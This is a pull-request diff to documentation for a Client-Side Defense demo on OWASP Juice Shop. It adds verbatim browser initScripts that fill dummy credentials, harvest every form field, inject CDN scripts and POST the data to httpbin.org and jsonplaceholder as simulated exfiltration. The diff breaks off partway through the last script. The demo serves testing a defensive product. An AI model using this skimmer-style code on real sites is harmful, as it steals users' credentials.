### PR TITLE
fix: deterministic documentation iteration 2 — eliminate vague language, add verbatim initScripts, fix evidence mismatches

### DIFF
--- a/DEMO_EXECUTOR.md
+++ b/DEMO_EXECUTOR.md
@@ -63,7 +63,7 @@ If the GET returns `404`, report FAIL and stop.
 | Test | Result | Status |
 | ---- | ------ | ------ |
 | DNS-1: A Record | `198.51.100.10` | PASS |
-| TLS-1: Cert State | `AutoCertIssued` | PASS |
+| TLS-1: Cert State | `CertificateValid` | PASS (informational — does not block demo) |
 | CSD-1: JS Tag | `scriptTag` present | PASS |
 
 Reference the diagnostics test case IDs (DNS-1, DNS-2, TLS-1, LB-1,
@@ -129,10 +129,12 @@ Attack simulation via browser automation + API verification (Steps
    (clears accumulated initScripts), then `navigate_page` to
    `http://$F5XC_DOMAINNAME/#/login` with an `initScript` that
    saves native `setInterval`, `clearInterval`, `fetch`, and
-   `console.log` before zone.js patches them, polls for the
-   login form fields, fills credentials via the native
+   `console.log` before zone.js patches them (stored as `_si`,
+   `_ci`, `_fetch`, `_log`), polls for the login form fields,
+   fills credentials via the native
    `HTMLInputElement.prototype.value` setter, and immediately
-   executes the Combined Detection Script inline
+   executes the Combined Detection Script inline. Use the verbatim
+   initScript from `phase-2-attack.mdx` AI-Automated Execution
 2. **Dismiss Welcome Banner** — `press_key` with `Escape` to close
    the Welcome Banner. The cookie consent dialog is dismissed by
    the same Escape key. On subsequent visits these dialogs may
@@ -283,13 +285,15 @@ human confirmation before execution.**
 
 **Teardown order:**
 
-1. HTTPS Load Balancer (`${F5XC_LB_NAME}-https`) — depends on Origin Pool
-2. HTTP Load Balancer (`${F5XC_LB_NAME}-http`) — depends on Origin Pool
-3. Origin Pool (depends on Healthcheck)
-4. DNS zone cleanup — managed records auto-clean when LBs are deleted;
+1. Mitigated Domains — delete all CSD mitigated domains created in Phase 3
+   (skip if Phase 3 was not executed)
+2. HTTPS Load Balancer (`${F5XC_LB_NAME}-https`) — depends on Origin Pool
+3. HTTP Load Balancer (`${F5XC_LB_NAME}-http`) — depends on Origin Pool
+4. Origin Pool (depends on Healthcheck)
+5. DNS zone cleanup — managed records auto-clean when LBs are deleted;
    manual records need manual cleanup via `PUT`
-5. Healthcheck (only if created in Phase 1 Step 1)
-6. Protected Domain — delete the CSD protected domain registration
+6. Healthcheck (only if created in Phase 1 Step 1)
+7. Protected Domain — delete the CSD protected domain registration
 
 > **Do NOT delete the DNS zone.** The DNS zone is shared
 > infrastructure and should never be deleted. Only clean up records

--- a/docs/api-automation/index.mdx
+++ b/docs/api-automation/index.mdx
@@ -63,11 +63,11 @@ curl -s -H "Authorization: APIToken xF5XC_API_TOKENx" \
 | All Phase 1 objects exist and healthy | Optionally skip Phase 1 and start at Phase 2 |
 
 <Aside type="note">
-The mitigated domains list may return a count of 1 with null metadata even when no real mitigations exist. This is a backend artifact — treat it as 0 for decision purposes.
+The mitigated domains list may return a count of 1 with null metadata even when no real mitigations exist. This is a backend artifact. Decision rule: if the single item has null metadata (name is null or empty), treat it as 0. If it has real metadata, delete each item by name before proceeding.
 </Aside>
 
 <Aside type="note">
-CSD detections persist across infrastructure teardown/rebuild when the same protected domain is re-registered on the same tenant. After a teardown and rebuild, you do not need to wait 5-10 minutes for detections to appear — they are available immediately.
+CSD detections persist across infrastructure teardown/rebuild when the same protected domain is re-registered on the same tenant. After a teardown and rebuild, query `/detected_domains` once. If the response contains items, proceed immediately — no waiting required. If the response is empty, wait 30 seconds and query once more. If still empty after the second query, proceed anyway — detections will appear once the simulation runs.
 </Aside>
 
 ## AI Assistant Execution Protocol
@@ -356,7 +356,7 @@ If the load balancer `state` remains `VIRTUAL_HOST_PENDING_A_RECORD` after Phase
    ```bash
    dig +short xF5XC_DOMAINNAMEx A
    ```
-   If the A record resolves, the LB should transition to `VIRTUAL_HOST_READY` within 60 seconds.
+   If the A record resolves, the LB transitions to `VIRTUAL_HOST_READY`. Poll every 30 seconds, up to 4 iterations (2 minutes total). If still `VIRTUAL_HOST_PENDING_A_RECORD` after 2 minutes, re-check DNS propagation and report to operator.
 
 ### CSD Status Shows isConfigured: false
 

--- a/docs/api-automation/phase-1-build.mdx
+++ b/docs/api-automation/phase-1-build.mdx
@@ -352,7 +352,7 @@ curl -s \
 | `name` | `${F5XC_LB_NAME}-http` | PASS |
 | `domains` | Contains `F5XC_DOMAINNAME` | PASS |
 | `csd_enabled` | `true` | PASS — CSD is configured on this LB |
-| `state` | `VIRTUAL_HOST_READY` or `VIRTUAL_HOST_PENDING_A_RECORD` | Expected — HTTP LB transitions to READY once DNS resolves |
+| `state` | `VIRTUAL_HOST_READY` or `VIRTUAL_HOST_PENDING_A_RECORD` | Expected — HTTP LB transitions to READY once DNS resolves. Any other state (e.g. `VIRTUAL_HOST_FAILED`) is a FAIL — report to operator and do not proceed |
 
 **HTTPS LB (secondary):**
 
@@ -453,7 +453,7 @@ echo "$LB_CONFIG" | curl -s -X PUT \
   | jq .
 ```
 
-This GET+PUT re-apply does not change the LB configuration — it simply triggers the platform to re-evaluate the DNS zone and create managed records.
+This GET+PUT re-apply does not change the LB configuration — it simply triggers the platform to re-evaluate the DNS zone and create managed records. If the A record still does not resolve within 60 seconds after the re-apply, stop and report to the operator — do not retry the re-apply more than once.
 
 **3. Verify DNS resolution:**
 
@@ -712,7 +712,7 @@ After completing all verification checks, the AI assistant should present a cons
 **Phase 2 uses the HTTP LB.** HTTPS is optional — if TLS-1 shows `AutoCertDomainRateLimited` or LB-2 remains PENDING, the demo proceeds normally using `http://` URLs. Only DNS-1, LB-1, CSD-1, CSD-2, and CSD-3 are required to pass before proceeding to Phase 2.
 </Aside>
 
-If LB-1 shows PENDING, wait 1–2 minutes for DNS to propagate and re-check. LB-2 and TLS-1 may take 5–10 minutes or may not complete due to rate limiting — this is informational only.
+If LB-1 shows PENDING, poll every 30 seconds for up to 4 iterations (2 minutes total). If LB-1 is still not `VIRTUAL_HOST_READY` after 4 iterations, check DNS resolution with `dig` and report to operator — do not proceed until LB-1 reaches READY. For LB-2 and TLS-1, poll every 60 seconds for up to 10 iterations (10 minutes). If still in an intermediate state after 10 iterations, record the current state as INFO and proceed — these are informational and do not block demo progression.
 
 <Aside type="note">
 The `dns_info` field in the LB response may be empty (`[]`) even when DNS resolves correctly — this happens after a clean recreation. Always verify DNS resolution with `dig` rather than relying on `dns_info` for the VIP address.

--- a/docs/api-automation/phase-2-attack.mdx
+++ b/docs/api-automation/phase-2-attack.mdx
@@ -21,10 +21,87 @@ After the infrastructure is verified (all Phase 1 Step 7 checks PASS), run the a
 
 AI assistants with browser automation tools run the attack simulation programmatically:
 
-1. **Navigate with initScript** — first navigate to `about:blank` to ensure a clean document context (avoids stale initScripts from prior navigations), then `navigate_page` to `http://$F5XC_DOMAINNAME/#/login` with an `initScript` that saves native `setInterval`, `clearInterval`, `fetch`, and `console.log` before zone.js patches them, polls for the login form fields, fills credentials via the native `HTMLInputElement.prototype.value` setter, and immediately executes the Combined Detection Script inline
+1. **Navigate with initScript** — first navigate to `about:blank` to ensure a clean document context (avoids stale initScripts from prior navigations), then `navigate_page` to `http://$F5XC_DOMAINNAME/#/login` with an `initScript` that saves native `setInterval`, `clearInterval`, `fetch`, and `console.log` before zone.js patches them, polls for the login form fields, fills credentials via the native `HTMLInputElement.prototype.value` setter, and immediately executes the Combined Detection Script inline. Use the verbatim initScript below.
 2. **Dismiss Welcome Banner** — `press_key` with `Escape` to close the Welcome Banner. On subsequent visits the banner may not appear (cookies persisted). The cookie consent dialog is dismissed automatically by the Escape key
 3. **Wait for completion** — wait 10 seconds for all CDN script load/error callbacks and fetch promise resolutions to complete
 4. **Capture evidence** — `list_console_messages` to check for `[CSD Demo] Simulation complete` and CDN load results; `list_network_requests` filtered to `script` and `fetch` types to verify HTTP status codes (`200`/`201` for success, `pending` for held requests)
+
+**Phase 2 initScript (verbatim — use exactly as written):**
+
+```javascript
+// Save native references before zone.js patches them
+var _si = window.setInterval.bind(window);
+var _ci = window.clearInterval.bind(window);
+var _fetch = window.fetch.bind(window);
+var _log = window.console.log.bind(window.console);
+
+// Poll for login form fields, fill credentials, run detection script
+var _poll = _si(function() {
+  var emailEl = document.querySelector('input[type="email"]');
+  var passEl  = document.querySelector('input[type="password"]');
+  if (emailEl && passEl) {
+    _ci(_poll);
+    // Fill credentials via native setter (bypasses zone.js)
+    var nativeSet = Object.getOwnPropertyDescriptor(
+      window.HTMLInputElement.prototype, 'value').set;
+    nativeSet.call(emailEl, 'test@example.com');
+    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
+    nativeSet.call(passEl, 'P@ssword123');
+    passEl.dispatchEvent(new Event('input', { bubbles: true }));
+
+    // Run Combined Detection Script inline using native fetch for exfil
+    (function() {
+      _log('==================================================');
+      _log('[CSD Demo] Combined Detection Script — Starting');
+      _log('==================================================');
+
+      _log('\n[Formjack] Phase 1: Form field harvesting');
+      var inputs = document.querySelectorAll('input');
+      var harvested = {};
+      inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        harvested[name] = input.value || '(empty)';
+      });
+      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);
+
+      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
+      var cdns = [
+        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
+        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
+        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
+        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
+      ];
+      cdns.forEach(function(cdn) {
+        var script = document.createElement('script');
+        script.src = cdn.url;
+        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
+        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
+        document.head.appendChild(script);
+        _log('[Supply Chain] Injected script tag: ' + cdn.name);
+      });
+
+      _log('\n[Exfil] Phase 3: Data exfiltration');
+      var payload = JSON.stringify({
+        type: 'combined_demo', credentials: harvested,
+        page: window.location.href, timestamp: Date.now()
+      });
+      _fetch('https://httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
+        .then(function() { _log('[Exfil] Data sent to httpbin.org'); });
+      _fetch('https://jsonplaceholder.typicode.com/posts', {
+        method: 'POST', mode: 'no-cors',
+        headers: { 'Content-Type': 'application/json' }, body: payload
+      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });
+
+      _log('\n==================================================');
+      _log('[CSD Demo] Simulation complete');
+      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
+      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
+      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
+      _log('==================================================');
+    })();
+  }
+}, 300);
+```
 
 <Aside type="caution">
 **zone.js incompatibility** — Juice Shop uses Angular's zone.js, which patches `setTimeout`, `setInterval`, `fetch`, `XMLHttpRequest`, and other browser APIs. This breaks the MCP `evaluate_script`, `fill`, and `click` tools with `Cannot read properties of undefined (reading 'call')`. Use `navigate_page` with `initScript` instead — `initScript` runs before zone.js loads, so you can save native API references and use them in polling callbacks. The initScript must fill form fields using the native `HTMLInputElement.prototype.value` setter (not `fill`) and run the detection script inline (not via `setTimeout`, which zone.js may intercept after page load). See [Trigger Detection — AI-Automated Execution](/csd/trigger-detection/#ai-automated-execution) for details.
@@ -57,7 +134,14 @@ Operators without browser automation tools perform the steps manually:
 | Data exfiltration | Sends harvested data via `fetch` to `httpbin.org` and `jsonplaceholder.typicode.com` | Network calls to external domains |
 
 <Aside type="tip">
-Detection takes **5–10 minutes** to appear in the CSD dashboard for established tenants. After a fresh infrastructure rebuild or first-time protected domain registration, allow up to **30 minutes** for the full processing pipeline to initialize. The `/detected_domains` endpoint is the leading indicator — if exfil domains appear there, the CSD pipeline is processing data even if `/scripts` and `/formFields` remain empty. Proceed to Step 9 after waiting at least 5 minutes. For additional targeted simulations (individual attack categories, maximum detection stress test), see the [Attack Script Library](/csd/attack-scripts/).
+After running the attack simulation, use this deterministic polling loop to wait for detections:
+
+1. Query `/detected_domains` every 60 seconds
+2. If DET-3 passes (exfil domains appear in `/detected_domains`), proceed to Step 9 immediately
+3. If still empty after 10 queries (10 minutes), check CSD status (Phase 1 Step 5) and protected domain registration (Phase 1 Step 6) — one of these is likely misconfigured
+4. If still empty after 30 queries (30 minutes), stop and report to operator — do not continue to Phase 3
+
+For additional targeted simulations (individual attack categories, maximum detection stress test), see the [Attack Script Library](/csd/attack-scripts/).
 </Aside>
 
 ### Evidence
@@ -78,7 +162,7 @@ If the HTTPS LB certificate is valid (`CertificateValid`), you may optionally ru
 
 ## Step 9: Detection Verification via API
 
-After waiting at least **5 minutes** (up to 30 minutes on first use or after a fresh infrastructure rebuild), query the CSD API endpoints to confirm detections appeared. These endpoints are documented in the [API Reference](/csd/api-reference/) and use the same authentication and namespace as previous steps.
+Query the CSD API endpoints to confirm detections appeared. Use the polling loop: query `/detected_domains` every 60 seconds; proceed as soon as DET-3 passes. If DET-3 does not pass after 10 minutes, check CSD configuration. If DET-3 does not pass after 30 minutes, stop and report to operator. These endpoints are documented in the [API Reference](/csd/api-reference/) and use the same authentication and namespace as previous steps.
 
 <Aside type="note">
 **Endpoint processing order:** `/detected_domains` is populated first and is the primary indicator that the CSD pipeline is working. `/scripts` and `/formFields` are populated on a slower backend processing schedule and may remain empty for 20–30 minutes even after multiple simulation runs. If `/detected_domains` shows exfil domains (`httpbin.org`, `jsonplaceholder.typicode.com`), treat the simulation as successfully detected and proceed — the DET-1 check below reflects this.

--- a/docs/api-automation/phase-3-mitigate.mdx
+++ b/docs/api-automation/phase-3-mitigate.mdx
@@ -69,12 +69,12 @@ This step requires browser-side JavaScript execution — `curl` cannot trigger C
 
 ### AI-Automated Execution
 
-AI assistants with browser automation tools run the attack simulation programmatically:
+AI assistants with browser automation tools run the attack simulation programmatically using the same Phase 2 initScript (which saves native `fetch`):
 
-1. **Navigate with initScript** — first navigate to `about:blank` to ensure a clean document context (avoids stale initScripts from prior navigations), then `navigate_page` to `http://$F5XC_DOMAINNAME/#/login` with an `initScript` that saves native `setInterval` and `clearInterval` before zone.js patches them, polls for the login form fields, fills credentials via the native `HTMLInputElement.prototype.value` setter, and immediately executes the Combined Detection Script inline
+1. **Navigate with initScript** — first navigate to `about:blank` to ensure a clean document context (avoids stale initScripts from prior navigations), then `navigate_page` to `http://$F5XC_DOMAINNAME/#/login` with the **Phase 2 initScript** (verbatim code in [Phase 2 — AI-Automated Execution](/csd/api-automation/phase-2-attack/#ai-automated-execution)). This initScript saves native `setInterval`, `clearInterval`, `fetch`, and `console.log` — the native `fetch` reference is correct here because no mitigations are active
 2. **Dismiss Welcome Banner** — `press_key` with `Escape` to close the Welcome Banner. On subsequent visits the banner may not appear (cookies persisted). The cookie consent dialog is dismissed automatically by the Escape key
 3. **Wait for completion** — wait 10 seconds for all CDN script load/error callbacks and fetch promise resolutions to complete
-4. **Capture evidence** — `list_console_messages` to check for `[CSD Demo] Simulation complete` and CDN load results; `list_network_requests` filtered to `script` and `fetch` types to verify HTTP status codes (`200`/`201` for success, `net::ERR_INSUFFICIENT_RESOURCES` for blocked)
+4. **Capture evidence** — `list_console_messages` to check for `[CSD Demo] Simulation complete` and CDN load results; `list_network_requests` filtered to `script` and `fetch` types to verify HTTP status codes (`200`/`201` for success)
 
 <Aside type="caution">
 **zone.js incompatibility** — Juice Shop uses Angular's zone.js, which patches `setTimeout`, `setInterval`, `fetch`, `XMLHttpRequest`, and other browser APIs. This breaks the MCP `evaluate_script`, `fill`, and `click` tools with `Cannot read properties of undefined (reading 'call')`. Use `navigate_page` with `initScript` instead — `initScript` runs before zone.js loads, so you can save native API references and use them in polling callbacks. The initScript must fill form fields using the native `HTMLInputElement.prototype.value` setter (not `fill`) and run the detection script inline (not via `setTimeout`, which zone.js may intercept after page load). See [Trigger Detection — AI-Automated Execution](/csd/trigger-detection/#ai-automated-execution) for details.
@@ -233,12 +233,89 @@ This step uses the same browser automation sequence as Step 2. The difference is
 
 ### AI-Automated Execution
 
-AI assistants with browser automation tools re-run the attack simulation programmatically using the same sequence as Step 2:
+AI assistants with browser automation tools re-run the attack simulation programmatically. **Critical difference from Step 2:** The initScript must NOT save native `fetch`. The Step 2 initScript saves `window.fetch.bind(window)`, which bypasses CSD interception. The Step 5 initScript omits this, allowing CSD's patched `fetch()` to block requests to mitigated domains.
 
-1. **Navigate with initScript** — use `new_page` with `isolatedContext` for a clean browser context (avoids stale initScripts from Step 2), then navigate to `about:blank`, then to the login page with the initScript. **Critical:** The Step 5 initScript must NOT save native `fetch` — saving `window.fetch.bind(window)` bypasses CSD's mitigation interception. Only save `setInterval`, `clearInterval`, and `console.log`. Use zone.js-patched `fetch()` so CSD can intercept and block requests to mitigated domains
+1. **Navigate with initScript** — use `new_page` with `isolatedContext` for a clean browser context (avoids stale initScripts from Step 2), then navigate to `about:blank`, then to the login page with the **Phase 3 Step 5 initScript** below
 2. **Dismiss Welcome Banner** — `press_key` with `Escape`
 3. **Wait for completion** — wait 10 seconds for all async callbacks
 4. **Capture evidence** — `list_console_messages` to check for `[CSD Demo] Simulation complete`; `list_network_requests` to verify all 6 mitigated domains show `pending` (CSD holds requests indefinitely — the data never leaves the browser)
+
+**Phase 3 Step 5 initScript (verbatim — note: NO native `fetch` save):**
+
+```javascript
+// Save native references — NO fetch save (CSD must intercept fetch calls)
+var _si = window.setInterval.bind(window);
+var _ci = window.clearInterval.bind(window);
+var _log = window.console.log.bind(window.console);
+
+// Poll for login form fields, fill credentials, run detection script
+var _poll = _si(function() {
+  var emailEl = document.querySelector('input[type="email"]');
+  var passEl  = document.querySelector('input[type="password"]');
+  if (emailEl && passEl) {
+    _ci(_poll);
+    // Fill credentials via native setter (bypasses zone.js)
+    var nativeSet = Object.getOwnPropertyDescriptor(
+      window.HTMLInputElement.prototype, 'value').set;
+    nativeSet.call(emailEl, 'test@example.com');
+    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
+    nativeSet.call(passEl, 'P@ssword123');
+    passEl.dispatchEvent(new Event('input', { bubbles: true }));
+
+    // Run Combined Detection Script inline — uses CSD-patched fetch (not native)
+    (function() {
+      _log('==================================================');
+      _log('[CSD Demo] Combined Detection Script — Starting');
+      _log('==================================================');
+
+      _log('\n[Formjack] Phase 1: Form field harvesting');
+      var inputs = document.querySelectorAll('input');
+      var harvested = {};
+      inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        harvested[name] = input.value || '(empty)';
+      });
+      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);
+
+      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
+      var cdns = [
+        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
+        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
+        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
+        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
+      ];
+      cdns.forEach(function(cdn) {
+        var script = document.createElement('script');
+        script.src = cdn.url;
+        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
+        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
+        document.head.appendChild(script);
+        _log('[Supply Chain] Injected script tag: ' + cdn.name);
+      });
+
+      _log('\n[Exfil] Phase 3: Data exfiltration');
+      var payload = JSON.stringify({
+        type: 'combined_demo', credentials: harvested,
+        page: window.location.href, timestamp: Date.now()
+      });
+      // Uses CSD-patched fetch — CSD will intercept and block calls to mitigated domains
+      fetch('https://httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
+        .then(function() { _log('[Exfil] Data sent to httpbin.org'); });
+      fetch('https://jsonplaceholder.typicode.com/posts', {
+        method: 'POST', mode: 'no-cors',
+        headers: { 'Content-Type': 'application/json' }, body: payload
+      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });
+
+      _log('\n==================================================');
+      _log('[CSD Demo] Simulation complete');
+      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
+      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
+      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
+      _log('==================================================');
+    })();
+  }
+}, 300);
+```
 
 ### Manual Execution
 
@@ -248,7 +325,7 @@ Operators without browser automation tools re-run the simulation manually using 
 2. Enter dummy credentials in the Email and Password fields (do not submit)
 3. Open DevTools — press **F12** and switch to the **Console** tab
 4. Paste and run the Combined Detection Script from [Trigger Detection](/csd/trigger-detection/#run-the-combined-simulation-script)
-5. Observe console output — mitigated domain scripts trigger `onerror` callbacks instead of `onload`, and fetch calls to exfil domains fail with `TypeError: Failed to fetch`. The Network tab shows `net::ERR_INSUFFICIENT_RESOURCES` for all requests to mitigated domains
+5. Observe console output — mitigated domain scripts do not trigger `onload` or `onerror` callbacks (requests are held, not rejected). Fetch calls to exfil domains remain `pending` — neither `.then()` nor `.catch()` resolves. The Network tab shows `pending` for all requests to mitigated domains (CSD holds requests indefinitely — the data never leaves the browser)
 
 <Aside type="tip">
 After mitigation, the CSD JavaScript blocks network calls to mitigated domains by intercepting requests before they reach the network layer. The browser shows `pending` status for blocked requests — they are held indefinitely and never complete (the data never leaves the browser). Script tags are still injected into the DOM (the `appendChild` call succeeds), but the network requests to load the scripts are held. Neither `onload` nor `onerror` callbacks fire for held requests. Fetch calls to mitigated exfil domains also remain `pending` — neither `.then()` nor `.catch()` resolves.
@@ -273,7 +350,7 @@ This is the demo payoff — side-by-side evidence proving that the same attack, 
 
 | Signal | Before Mitigation (Step 2) | After Mitigation (Step 5) |
 | --- | --- | --- |
-| CDN script network calls | `200` or not visible (depends on fetch path) | `pending` — all 4 held by CSD, never complete |
+| CDN script network calls | `200` — CDN scripts injected via `<script>` tags load normally (network requests visible in DevTools) | `pending` — all 4 held by CSD, script tags injected into DOM but network requests never complete |
 | Exfil to httpbin.org | `200` — data exfiltrated | `pending` — held by CSD, data never leaves browser |
 | Exfil to jsonplaceholder.typicode.com | `201` — data exfiltrated | `pending` — held by CSD, data never leaves browser |
 | Script `onerror` callbacks | Not fired (scripts loaded) | Not fired (requests suspended, not rejected) |
@@ -282,7 +359,7 @@ This is the demo payoff — side-by-side evidence proving that the same attack, 
 
 ### Verify Mitigation in Backend Data
 
-Wait **5–10 minutes** for CSD to process the second simulation run, then confirm the mitigation is reflected in detection and script data.
+Query `/detected_domains` every 60 seconds for up to 10 iterations (10 minutes). Proceed to the comparison table once the query returns, or after the 10-minute maximum — these checks are informational and do not gate Phase 4.
 
 **Check Detected Domains Post-Mitigation:**
 
@@ -318,7 +395,7 @@ curl -s -X POST \
 | Before vs After comparison (Step 6) | Clear difference between Step 2 and Step 5 evidence | PASS / FAIL |
 
 <Aside type="note">
-Detection status updates after mitigation may take several minutes to appear in the API response. If the domains still show "Action Needed" immediately after mitigation, wait 5–10 minutes and re-query.
+Detection status updates after mitigation may take time to appear in the API response. If the domains still show "Action Needed" immediately after mitigation, query `/detected_domains` every 60 seconds for up to 10 iterations (10 minutes). If still not updated after 10 iterations, record the current state as INFO — this does not block Phase 4.
 </Aside>
 
 ---

--- a/docs/api-automation/phase-4-teardown.mdx
+++ b/docs/api-automation/phase-4-teardown.mdx
@@ -64,7 +64,7 @@ curl -s -X DELETE \
   "xF5XC_API_URLx/api/config/namespaces/xF5XC_NAMESPACEx/http_loadbalancers/xF5XC_LB_NAMEx-https"
 ```
 
-Verify: `GET /api/config/namespaces/\{namespace\}/http_loadbalancers` should not contain `${F5XC_LB_NAME}-https`.
+Verify: `GET /api/config/namespaces/\{namespace\}/http_loadbalancers` should not contain `${F5XC_LB_NAME}-https`. If the object still appears in the list after DELETE returned `200`, wait 30 seconds and re-check once. If still present after the second check, report to operator — do not proceed.
 
 ## Delete HTTP Load Balancer
 
@@ -76,7 +76,7 @@ curl -s -X DELETE \
   "xF5XC_API_URLx/api/config/namespaces/xF5XC_NAMESPACEx/http_loadbalancers/xF5XC_LB_NAMEx-http"
 ```
 
-Verify: `GET /api/config/namespaces/\{namespace\}/http_loadbalancers` should not contain `${F5XC_LB_NAME}-http`.
+Verify: `GET /api/config/namespaces/\{namespace\}/http_loadbalancers` should not contain `${F5XC_LB_NAME}-http`. If the object still appears in the list after DELETE returned `200`, wait 30 seconds and re-check once. If still present after the second check, report to operator — do not proceed.
 
 ## Delete Origin Pool
 
@@ -86,7 +86,7 @@ curl -s -X DELETE \
   "xF5XC_API_URLx/api/config/namespaces/xF5XC_NAMESPACEx/origin_pools/xF5XC_ORIGIN_POOLx"
 ```
 
-Verify: `GET /api/config/namespaces/\{namespace\}/origin_pools` should not contain the pool name.
+Verify: `GET /api/config/namespaces/\{namespace\}/origin_pools` should not contain the pool name. If the object still appears in the list after DELETE returned `200`, wait 30 seconds and re-check once. If still present after the second check, report to operator.
 
 ## Delete Healthcheck
 
@@ -96,7 +96,7 @@ curl -s -X DELETE \
   "xF5XC_API_URLx/api/config/namespaces/xF5XC_NAMESPACEx/healthchecks/xF5XC_HC_NAMEx"
 ```
 
-Verify: `GET /api/config/namespaces/\{namespace\}/healthchecks` should not contain the healthcheck name.
+Verify: `GET /api/config/namespaces/\{namespace\}/healthchecks` should not contain the healthcheck name. If the object still appears in the list after DELETE returned `200`, wait 30 seconds and re-check once. If still present after the second check, report to operator.
 
 ## Delete Protected Domain
 

--- a/docs/trigger-detection.mdx
+++ b/docs/trigger-detection.mdx
@@ -101,7 +101,7 @@ CSD monitors JavaScript behavior inside the browser. Unlike WAF or Bot Defense, 
 
    <Code code={combinedScript} lang="js" title="Combined Detection Script" />
 
-5. Observe the phased `[CSD Demo]` console output confirming each step: field harvesting, script injection from 4 CDN domains, and data exfiltration. Some CDN scripts use ES module syntax (`export`) which causes `Uncaught SyntaxError` when loaded as classic scripts — this is expected and does not affect CSD detection
+5. Observe the phased `[CSD Demo]` console output confirming each step: field harvesting, script injection from 4 CDN domains, and data exfiltration. `esm.sh` serves ES module syntax (`export default …`) — when loaded as a classic `<script>` tag this causes `Uncaught SyntaxError: Cannot use import statement outside a module`. This is expected and does not affect CSD detection (the script tag is still injected and the network request is still made)
 
    <Screenshot light="/images/devtools-console-output-light.png" dark="/images/devtools-console-output-dark.png" alt="Console output after running the simulation script" />
 </Steps>
@@ -110,10 +110,89 @@ CSD monitors JavaScript behavior inside the browser. Unlike WAF or Bot Defense, 
 
 AI assistants with browser automation tools (MCP Chrome DevTools, Playwright, Puppeteer) execute the simulation programmatically instead of following the manual steps above:
 
-1. **Navigate with initScript** — first navigate to `about:blank` to ensure a clean document context, then `navigate_page` to the login page URL (e.g., `http://$F5XC_DOMAINNAME/#/login`) with an `initScript` that saves native `setInterval` and `clearInterval` before zone.js patches them, polls for the login form fields, fills credentials via the native `HTMLInputElement.prototype.value` setter, and immediately executes the Combined Detection Script inline
+1. **Navigate with initScript** — first navigate to `about:blank` to ensure a clean document context, then `navigate_page` to the login page URL (e.g., `http://$F5XC_DOMAINNAME/#/login`) with an `initScript` that saves native `setInterval`, `clearInterval`, `fetch`, and `console.log` before zone.js patches them, polls for the login form fields, fills credentials via the native `HTMLInputElement.prototype.value` setter, and immediately executes the Combined Detection Script inline. Use the verbatim initScript below.
 2. **Dismiss Welcome Banner** — `press_key` with `Escape` to close the Welcome Banner. On subsequent visits the banner may not appear (cookies persisted)
 3. **Wait for completion** — wait 10 seconds for all CDN script load/error callbacks and fetch promise resolutions to complete
 4. **Capture evidence** — `list_console_messages` to check for `[CSD Demo] Simulation complete`; `list_network_requests` filtered to `script` and `fetch` types to verify HTTP status codes
+
+**initScript harness (verbatim — wraps the Combined Detection Script for automated execution):**
+
+```javascript
+// Save native references before zone.js patches them
+var _si = window.setInterval.bind(window);
+var _ci = window.clearInterval.bind(window);
+var _fetch = window.fetch.bind(window);
+var _log = window.console.log.bind(window.console);
+
+// Poll for login form fields, fill credentials, run detection script
+var _poll = _si(function() {
+  var emailEl = document.querySelector('input[type="email"]');
+  var passEl  = document.querySelector('input[type="password"]');
+  if (emailEl && passEl) {
+    _ci(_poll);
+    // Fill credentials via native setter (bypasses zone.js)
+    var nativeSet = Object.getOwnPropertyDescriptor(
+      window.HTMLInputElement.prototype, 'value').set;
+    nativeSet.call(emailEl, 'test@example.com');
+    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
+    nativeSet.call(passEl, 'P@ssword123');
+    passEl.dispatchEvent(new Event('input', { bubbles: true }));
+
+    // Run Combined Detection Script inline using native fetch for exfil
+    (function() {
+      _log('==================================================');
+      _log('[CSD Demo] Combined Detection Script — Starting');
+      _log('==================================================');
+
+      _log('\n[Formjack] Phase 1: Form field harvesting');
+      var inputs = document.querySelectorAll('input');
+      var harvested = {};
+      inputs.forEach(function(input) {
+        var name = input.name || input.id || input.type;
+        harvested[name] = input.value || '(empty)';
+      });
+      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);
+
+      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
+      var cdns = [
+        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
+        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
+        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
+        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
+      ];
+      cdns.forEach(function(cdn) {
